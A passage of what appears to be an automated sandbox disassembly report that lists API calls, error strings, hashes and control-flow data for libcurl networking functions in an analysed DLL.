                                                                                                                            • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000001,00000004), ref: 6B6F6DCD
                                                                                                                            • bind.WS2_32(00000000,?,00000010), ref: 6B6F6DE3
                                                                                                                            • getsockname.WS2_32(00000000,?,00000010), ref: 6B6F6DFB
                                                                                                                            • listen.WS2_32(00000000,00000001), ref: 6B6F6E0D
                                                                                                                            • socket.WS2_32(00000002,00000001,00000000), ref: 6B6F6E22
                                                                                                                            • connect.WS2_32(00000000,?,00000010), ref: 6B6F6E36
                                                                                                                            • accept.WS2_32(00000000,00000000,00000000), ref: 6B6F6E4A
                                                                                                                            • curl_msnprintf.LIBCURL(?,0000000C,6B730CA0,6B6C1172), ref: 6B6F6E68
                                                                                                                            • send.WS2_32(6B6C1172,?,?,00000000), ref: 6B6F6E88
                                                                                                                            • recv.WS2_32(C74C79C0,00000001,0000000C,00000000), ref: 6B6F6E9D
                                                                                                                            • closesocket.WS2_32(00000000), ref: 6B6F6EF6
                                                                                                                            • closesocket.WS2_32(00000000), ref: 6B6F6F16
                                                                                                                            • closesocket.WS2_32(6B6C1172), ref: 6B6F6F1A
                                                                                                                            • closesocket.WS2_32(C74C79C0), ref: 6B6F6F1F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: closesocket$socket$acceptbindconnectcurl_msnprintfgetsocknamehtonllistenrecvsendsetsockopt
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4135244658-0
                                                                                                                            • Opcode ID: 942f72e852dfa858aa4c2396e58b1b9fff88825678885629bf4f7c8019508b76
                                                                                                                            • Instruction ID: 98f49f35b89971e72205dceb9d96e8e3497c09310d714a0854c1a009fa906c9a
                                                                                                                            • Opcode Fuzzy Hash: 942f72e852dfa858aa4c2396e58b1b9fff88825678885629bf4f7c8019508b76
                                                                                                                            • Instruction Fuzzy Hash: 0951E571909204ABDB109F78CC84BAD7B7BAF06330F1053A6E979AB1D0D774A947CB60

                                                                                                                             Control-flow Graph
                                                                                                                             [Rendered control-flow graph for the function starting at 6b6efef0 (basic blocks numbered 164-275, executed/not-executed colouring not recoverable); APIs referenced in the graph: WSASetLastError, Sleep, select, __WSAFDIsSet; edge list omitted.]
                                                                                                                            APIs
                                                                                                                            • WSASetLastError.WS2_32(00002726), ref: 6B6EFF52
                                                                                                                            • WSASetLastError.WS2_32(00002726,00000000,00000001,000000FF), ref: 6B6F0105
                                                                                                                            • WSASetLastError.WS2_32(00002726,00000000,00000001,000000FF), ref: 6B6F012E
                                                                                                                            • Sleep.KERNEL32(FFFFFFFE,00000000,00000001,000000FF), ref: 6B6F0157
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6F01AA
                                                                                                                            • select.WS2_32(?,?,?,?,?), ref: 6B6F0271
                                                                                                                            • __WSAFDIsSet.WS2_32(?,?), ref: 6B6F02A9
                                                                                                                            • __WSAFDIsSet.WS2_32(?,?), ref: 6B6F02E9
                                                                                                                            • __WSAFDIsSet.WS2_32(?,?), ref: 6B6F0306
                                                                                                                            • Sleep.KERNEL32(FFFFFFFE), ref: 6B6F037E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                             • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$Sleep$Unothrow_t@std@@@__ehfuncinfo$??2@select
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1691268743-0
                                                                                                                            • Opcode ID: 086e0b6a84231f487bc81a9ec012026eb2c1e74d270ef29f0820153e47994543
                                                                                                                            • Instruction ID: ffcbda5257f79f5bcf841fca8670f026def57111583e868bae8aced08f4f1104
                                                                                                                            • Opcode Fuzzy Hash: 086e0b6a84231f487bc81a9ec012026eb2c1e74d270ef29f0820153e47994543
                                                                                                                            • Instruction Fuzzy Hash: D0D199B0A042198BEB25CF69C9507EA73FEFF49310F1045EDE859D7290D7788A82CB54

                                                                                                                             Control-flow Graph
                                                                                                                             [Rendered control-flow graph for the function starting at 6b6c2d20 (basic blocks numbered 346-478, executed/not-executed colouring not recoverable); API referenced in the graph: WSASetLastError, plus internal calls to 6b6fe5d0, 6b6fe680, 6b6f05d0, 6b6f03a0, 6b6f06b0, 6b6c3f40, 6b6c4060, 6b6c4740, 6b6c46a0, 6b6c28e0, 6b6d8450, 6b6fa0e0, 6b70db71, 6b70db90; edge list omitted.]
                                                                                                                            Strings
                                                                                                                            • Failed to connect to %s port %ld: %s, xrefs: 6B6C327D
                                                                                                                            • After %I64dms connect time, move on!, xrefs: 6B6C2F3C
                                                                                                                            • Connection time-out, xrefs: 6B6C32C4
                                                                                                                            • connect to %s port %ld failed: %s, xrefs: 6B6C3070
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                             • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: After %I64dms connect time, move on!$Connection time-out$Failed to connect to %s port %ld: %s$connect to %s port %ld failed: %s
                                                                                                                            • API String ID: 0-184998888
                                                                                                                            • Opcode ID: 4d2d07853d6dddb463f353d523d1ba980c8e040a4ad7d1ddd0f506e9d6a5ddee
                                                                                                                            • Instruction ID: bbb73d10757c69febd2cfbe401119ee47ba58b8f8a3204f31bf8f2e19c37b324
                                                                                                                            • Opcode Fuzzy Hash: 4d2d07853d6dddb463f353d523d1ba980c8e040a4ad7d1ddd0f506e9d6a5ddee
                                                                                                                            • Instruction Fuzzy Hash: 34F1D1B1A007049FDB21DF389C41BEBB7B5EF89318F0041E9E85D97251DB39AA84CB52

                                                                                                                             Control-flow Graph
                                                                                                                             [Rendered control-flow graph for the function starting at 6b6f09f0 (basic blocks numbered 554-584, executed/not-executed colouring not recoverable); APIs referenced in the graph: send, recv, WSAGetLastError; edge list omitted.]
                                                                                                                            APIs
                                                                                                                            • recv.WS2_32(?,?,?,00000000), ref: 6B6F0B04
                                                                                                                            • send.WS2_32(?,?,?,00000000), ref: 6B6F0B2B
                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B6F0B3E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                             • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastrecvsend
                                                                                                                            • String ID: Send failure: %s
                                                                                                                            • API String ID: 3418755260-857917747
                                                                                                                            • Opcode ID: 7ad36d2e7356ec7ed1d7823d97d5de49b9bfbd58f105dbdc3c187012287797db
                                                                                                                            • Instruction ID: 53959c87eca85fc5d8a90debbf1f0b601e40472435cff3826b8151a5b056b5a0
                                                                                                                            • Opcode Fuzzy Hash: 7ad36d2e7356ec7ed1d7823d97d5de49b9bfbd58f105dbdc3c187012287797db
                                                                                                                            • Instruction Fuzzy Hash: BA51B4B1B002199FDB20CF28CC41B99B7F9EF05364F1042AAE969D7390D775A992CF80

                                                                                                                             Control-flow Graph
                                                                                                                             [Rendered control-flow graph for the function starting at 6b6c40c0 (basic blocks numbered 0-124, executed/not-executed colouring not recoverable); APIs referenced in the graph: socket, setsockopt, getsockopt, WSAIoctl, WSAGetLastError, connect; edge list omitted.]
                                                                                                                            APIs
                                                                                                                            • socket.WS2_32(?,?,?), ref: 6B6C41C1
                                                                                                                              • Part of subcall function 6B6F06B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,$lnk), ref: 6B6F06EF
                                                                                                                              • Part of subcall function 6B6F06B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B6F072F
                                                                                                                            • setsockopt.WS2_32(00000000,00000006,00000001,?,00000004), ref: 6B6C42C8
                                                                                                                            • WSAGetLastError.WS2_32(?,00000100), ref: 6B6C42DE
                                                                                                                            • getsockopt.WS2_32(00000000,0000FFFF,00001001,00000000,00000004), ref: 6B6C4377
                                                                                                                            • setsockopt.WS2_32(00000000,0000FFFF,00001001,00004020,00000004), ref: 6B6C43A3
                                                                                                                            • setsockopt.WS2_32(00000000,0000FFFF,00000008,00000000,00000004), ref: 6B6C43DE
                                                                                                                            • WSAIoctl.WS2_32(00000000,98000004,00000001,0000000C,00000000,00000000,00000004,00000000,00000000), ref: 6B6C4461
                                                                                                                            • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000007), ref: 6B6C446B
                                                                                                                              • Part of subcall function 6B6EA660: ioctlsocket.WS2_32(00000000,8004667E,TElk), ref: 6B6EA67A
                                                                                                                              • Part of subcall function 6B6FE5D0: QueryPerformanceCounter.KERNEL32(6B6EF03B,?,6B6C669E,6B6EF03B,?,?,?,?), ref: 6B6FE5E5
                                                                                                                              • Part of subcall function 6B6FE5D0: __alldvrm.LIBCMT ref: 6B6FE5FE
                                                                                                                              • Part of subcall function 6B6FE5D0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6FE627
                                                                                                                            • connect.WS2_32(00000000,?,?), ref: 6B6C45D2
                                                                                                                              • Part of subcall function 6B6E69D0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6E6A0D
                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B6C4604
                                                                                                                            Strings
                                                                                                                            • Trying %s:%ld..., xrefs: 6B6C4271
                                                                                                                            • Immediate connect fail for %s: %s, xrefs: 6B6C463A
                                                                                                                            • Failed to set SO_KEEPALIVE on fd %d, xrefs: 6B6C43E9
                                                                                                                            • Could not set TCP_NODELAY: %s, xrefs: 6B6C42EB
                                                                                                                            • @, xrefs: 6B6C430C
                                                                                                                            • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 6B6C4235
                                                                                                                            • Failed to set SIO_KEEPALIVE_VALS on fd %d: %d, xrefs: 6B6C4473
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                             • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastsetsockopt$Unothrow_t@std@@@__ehfuncinfo$??2@$CounterIoctlPerformanceQuery__alldvrmconnectcurl_msnprintfcurl_mvsnprintfgetsockoptioctlsocketsocket
                                                                                                                            • String ID: Trying %s:%ld...$ @$Could not set TCP_NODELAY: %s$Failed to set SIO_KEEPALIVE_VALS on fd %d: %d$Failed to set SO_KEEPALIVE on fd %d$Immediate connect fail for %s: %s$sa_addr inet_ntop() failed with errno %d: %s
                                                                                                                            • API String ID: 194311702-3868455274
                                                                                                                            • Opcode ID: ba3f447e3a5afb9c483e2d15c8e6d583adbf2df9715ced50144f6a203951d265
                                                                                                                            • Instruction ID: d97729a51b8a95d8d4beee8c286c698f53ad9e2caf9096ffc921c039a097a003
                                                                                                                            • Opcode Fuzzy Hash: ba3f447e3a5afb9c483e2d15c8e6d583adbf2df9715ced50144f6a203951d265
                                                                                                                            • Instruction Fuzzy Hash: 94F193B1D40219AFEB20DF74CC89BAEB7B8EF05304F1001E6E519E6290DB799E858F55

                                                                                                                            Control-flow Graph

APIs
• getpeername.WS2_32(?,?,?), ref: 6B6C36FE
• WSAGetLastError.WS2_32 ref: 6B6C3708
  • Part of subcall function 6B6FA0E0: GetLastError.KERNEL32(?,?,00000100), ref: 6B6FA0E7
  • Part of subcall function 6B6F05D0: curl_mvsnprintf.LIBCURL(?,00000100,6B6EC830,?), ref: 6B6F0610
• getsockname.WS2_32(?,?,00000080), ref: 6B6C3772
• WSAGetLastError.WS2_32 ref: 6B6C377C
Strings
• getpeername() failed with errno %d: %s, xrefs: 6B6C3724
• ssrem inet_ntop() failed with errno %d: %s, xrefs: 6B6C3801
• getsockname() failed with errno %d: %s, xrefs: 6B6C3798
• ssloc inet_ntop() failed with errno %d: %s, xrefs: 6B6C38A0
Memory Dump Source
• Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
• Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID: ErrorLast$curl_mvsnprintfgetpeernamegetsockname
• String ID: getpeername() failed with errno %d: %s$getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
• API String ID: 673488319-670633250
• Opcode ID: f794888c9428704316612fe447c4d380d2cebe23082d3aea871a010df98db92f
• Instruction ID: ecf90f9bae24e301c42d52fef031eada92b570d952f6195d42ad8dcae2284dde
• Opcode Fuzzy Hash: f794888c9428704316612fe447c4d380d2cebe23082d3aea871a010df98db92f
• Instruction Fuzzy Hash: CF81B0B59007089BD721DF74C945BEAB3FCEF58308F1041AAE99D9B202EB357A85CB54

Control-flow Graph

APIs
• curl_msnprintf.LIBCURL(?,0000000C,6B72B330,?), ref: 6B6C16FA
  • Part of subcall function 6B6C6E10: getaddrinfo.WS2_32(?,?,?,6B72B330), ref: 6B6C6E2E
• WSAGetLastError.WS2_32 ref: 6B6C1722
• WSAGetLastError.WS2_32 ref: 6B6C1728
• EnterCriticalSection.KERNEL32(?), ref: 6B6C173B
• LeaveCriticalSection.KERNEL32(?), ref: 6B6C1749
• send.WS2_32(?,?,00000001,00000000), ref: 6B6C1778
• WSAGetLastError.WS2_32 ref: 6B6C1782
• LeaveCriticalSection.KERNEL32(?), ref: 6B6C1790
Memory Dump Source
• Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
• Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID: CriticalErrorLastSection$Leave$Entercurl_msnprintfgetaddrinfosend
• String ID:
• API String ID: 1592919352-0
• Opcode ID: 31f7f343508174b5c2a5f49438565bbb3e12dd81bffc949d545c7eac986e72aa
• Instruction ID: 431a854138dc254588308927b72f378d46f77fcf58eb6134e7449db850bcff70
• Opcode Fuzzy Hash: 31f7f343508174b5c2a5f49438565bbb3e12dd81bffc949d545c7eac986e72aa
• Instruction Fuzzy Hash: B0217F71500609DBDB219FB5CC85BABBBF8EF05300F10452AE666D3250EB35E915CBA5

Control-flow Graph

APIs
• inet_pton.WS2_32(00000002,00000000,?), ref: 6B6D8590
• inet_pton.WS2_32(00000017,00000000,?), ref: 6B6D85C0
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
• Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID: inet_pton
• String ID: )<lk$)<lk$)<lk$Hostname %s was found in DNS cache
• API String ID: 1350483568-3671802404
• Opcode ID: 1c28eafcb50f3711334e6d1174d04fe58609dc9bf351ed409e48cacdd613dded
• Instruction ID: 356f66995a02274debb31f0126a8ce06fd1ff0848e54ff8c884d9b3d939e2fd2
• Opcode Fuzzy Hash: 1c28eafcb50f3711334e6d1174d04fe58609dc9bf351ed409e48cacdd613dded
• Instruction Fuzzy Hash: 5961E5B1D00209ABDB118BB4DC46BFFBBB8EF05328F0011A5E914B6291E7785A15CBE5

Control-flow Graph

APIs
• curl_multi_remove_handle.LIBCURL(?), ref: 6B6D1681
• curl_multi_cleanup.LIBCURL(?), ref: 6B6D1691
• curl_slist_free_all.LIBCURL(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B6D1904
Memory Dump Source
• Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
• Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID: curl_multi_cleanupcurl_multi_remove_handlecurl_slist_free_all
• String ID:
• API String ID: 3107128920-0
• Opcode ID: 7d09ce2e7191af035cb1e8f6d66df7902976baac0e5090d9848ab54a849070cc
• Instruction ID: 6ce3f8b9e2d62156689427ca7a2a7d36190fc0afffa378f0d2f767684dfe2421
• Opcode Fuzzy Hash: 7d09ce2e7191af035cb1e8f6d66df7902976baac0e5090d9848ab54a849070cc
• Instruction Fuzzy Hash: AB6152B8001B90DBDB216FB0DD0ABC67FE5BF0530AF00485AE5AE52654C7B9B054CF65

Control-flow Graph

Memory Dump Source
• Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
• Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 72a322f10b3873b807f612451f5fb050e4e8b84df307eaafe1eeccae1deeb89b
• Instruction ID: 15175e5a1453be4b8627e4ad3f3ce228d32a0340ccbcd95a4dcbd3ea0a822d5e
• Opcode Fuzzy Hash: 72a322f10b3873b807f612451f5fb050e4e8b84df307eaafe1eeccae1deeb89b
• Instruction Fuzzy Hash: 76014EB1E0121467DB2259759CC1BAB7B6CCF55A5CF0400A9EC0CA7283D7288C0183F2

Control-flow Graph

APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6C2B71
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6C2BA0
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
• Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: Connection time-out
• API String ID: 885266447-165637984
• Opcode ID: 5b287ab0d8453ec230e27cae544457afd2878332ac730b8cec12dff7ce44126f
• Instruction ID: e18efaf4b1d3f5ba7d7f9a25b5939464115666edf26541ca5fef084593084e37
• Opcode Fuzzy Hash: 5b287ab0d8453ec230e27cae544457afd2878332ac730b8cec12dff7ce44126f
• Instruction Fuzzy Hash: BF71AEB1E006058FDB14CF68C985BABB7B5FF84314F1491B9EC18AB351E7369942CB81

Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • recv.WS2_32(00000008,?,?,00000000), ref: 6B6F07EE
                                                                                                                            • WSAGetLastError.WS2_32(?,6B6F737C,?,?,00000008,?), ref: 6B6F07FB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                             • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastrecv
                                                                                                                            • String ID: |sok
                                                                                                                            • API String ID: 2514157807-1847581065
                                                                                                                            • Opcode ID: dc9ce6d7090bd6e90c7468e110a5b9ddd298d6537c754885b622d4eb5261dae7
                                                                                                                            • Instruction ID: 79449fb72f6e1e6c788e7dd7e6d48e92b1ac703c5c5d4f0ac18e72ecaac282de
                                                                                                                            • Opcode Fuzzy Hash: dc9ce6d7090bd6e90c7468e110a5b9ddd298d6537c754885b622d4eb5261dae7
                                                                                                                            • Instruction Fuzzy Hash: 97E09A3020820CAFDF058F70DC0475E3BA6EF45320F504568F9298A3D0C732E922AB50

                                                                                                                             Control-flow Graph
                                                                                                                             control_flow_graph 746 6b6c6e10-6b6c6e39 getaddrinfo 747 6b6c6e3f-6b6c6e45 746->747 748 6b6c6fa7-6b6c6fab 746->748 749 6b6c6e4b-6b6c6e4c 747->749 750 6b6c6f93-6b6c6f99 WSASetLastError 747->750 751 6b6c6e50-6b6c6e55 749->751 752 6b6c6f9f-6b6c6fa6 750->752 753 6b6c6e6e 751->753 754 6b6c6e57-6b6c6e5a 751->754 752->748 756 6b6c6e70-6b6c6e79 753->756 755 6b6c6e60-6b6c6e65 754->755 755->755 757 6b6c6e67-6b6c6e6c 755->757 758 6b6c6e7b-6b6c6e80 756->758 759 6b6c6e82-6b6c6e85 756->759 757->756 760 6b6c6e90-6b6c6e97 758->760 761 6b6c6e8b 759->761 762 6b6c6f35-6b6c6f3a 759->762 760->762 764 6b6c6e9d-6b6c6ea2 760->764 761->760 762->751 763 6b6c6f40 762->763 765 6b6c6f43-6b6c6f49 763->765 764->762 766 6b6c6ea8-6b6c6eaa 764->766 767 6b6c6f4b-6b6c6f4c freeaddrinfo 765->767 768 6b6c6f52-6b6c6f54 765->768 766->762 769 6b6c6eb0-6b6c6ec3 766->769 767->768 770 6b6c6f8f-6b6c6f91 768->770 771 6b6c6f56-6b6c6f58 768->771 776 6b6c6ec9-6b6c6f0b call 6b70f070 769->776 777 6b6c6f85-6b6c6f8d 769->777 770->750 770->752 772 6b6c6f5a 771->772 773 6b6c6f76-6b6c6f84 771->773 775 6b6c6f60-6b6c6f71 772->775 781 6b6c6f73 775->781 782 6b6c6f0d-6b6c6f20 call 6b70f070 776->782 783 6b6c6f23-6b6c6f2d 776->783 777->765 781->773 782->783 785 6b6c6f2f 783->785 786 6b6c6f32 783->786 785->786 786->762
                                                                                                                            APIs
                                                                                                                            • getaddrinfo.WS2_32(?,?,?,6B72B330), ref: 6B6C6E2E
                                                                                                                            • freeaddrinfo.WS2_32(6B72B330,?,?,6B72B330,?), ref: 6B6C6F4C
                                                                                                                            • WSASetLastError.WS2_32(00002AF9,?,?,6B72B330,?), ref: 6B6C6F99
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                             • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastfreeaddrinfogetaddrinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1817844550-0
                                                                                                                            • Opcode ID: 8ce6bc7a58fa13c4e975ad497f221630ff0aaa238399f03e126b200a974cfad6
                                                                                                                            • Instruction ID: 8a556fb604b0ef39da94450002e8a6a60a58b41d8dc0d3a3614f34c7306c7daf
                                                                                                                            • Opcode Fuzzy Hash: 8ce6bc7a58fa13c4e975ad497f221630ff0aaa238399f03e126b200a974cfad6
                                                                                                                            • Instruction Fuzzy Hash: 1A51ACB1E047069FDB10CF99D580AABB7F6FF08700B0485AAE869D7310DB34E914CB96

                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNEL32(6B6C16D0,6B6C1218,6B718204,00000000,00000000,6B6C16D0), ref: 6B7183A9
                                                                                                                            • GetLastError.KERNEL32(?,?,?,6B6C9136,00000000,00000000,6B6C16D0,6B6C1218,00000000,00000000), ref: 6B7183B5
                                                                                                                            • __dosmaperr.LIBCMT ref: 6B7183BC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
